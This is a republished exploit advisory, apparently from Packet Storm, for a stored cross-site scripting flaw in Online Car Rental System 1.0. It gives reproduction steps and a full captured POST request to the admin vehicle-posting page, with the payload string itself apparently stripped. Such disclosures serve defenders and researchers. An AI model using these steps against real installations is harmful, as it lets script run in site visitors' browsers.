Online Car Rental System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 10th, 2021 📆 | 3041 Views ⚑

0

Online Car Rental System 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Online Car Rental System 1.0 – Stored Cross Site Scripting
# Date: 9/2/2021
# Exploit Author: Naved Shaikh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
# Version: V 1.0
# Tested on Windows 10, XAMPP

Steps:
1) Open http://localhost/car-rental/admin/post-avehical.php

2) Fill All the details on the page. After submitting, capture the request and change the “vehicalorcview” parameter with our Payload “” and submit

3) Open the http://localhost/car-rental/ and our Payload excuted.

Request
POST /car-rental/admin/post-avehical.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=—————————13786099262839578593645594965
Content-Length: 2724377
Origin: http://localhost
Connection: close
Referer: http://localhost/car-rental/admin/post-avehical.php
Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2
Upgrade-Insecure-Requests: 1

—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”vehicletitle”

TestName
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”brandname”

2
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”vehicalorcview”


—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”priceperday”

200
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”fueltype”

Diesel
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”modelyear”

2008
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”seatingcapacity”

22
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”img1″; filename=”Untitled.png”
Content-Type: image/png

‰PNG
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”img5″; filename=””
Content-Type: application/octet-stream

—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”powerdoorlocks”

1
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”antilockbrakingsys”

1
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”driverairbag”

1
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”passengerairbag”

1
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”centrallocking”

1
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”crashcensor”

1
—————————–13786099262839578593645594965
Content-Disposition: form-data; name=”submit”

—————————–13786099262839578593645594965–

Source link

Tagged with:



Leave a Reply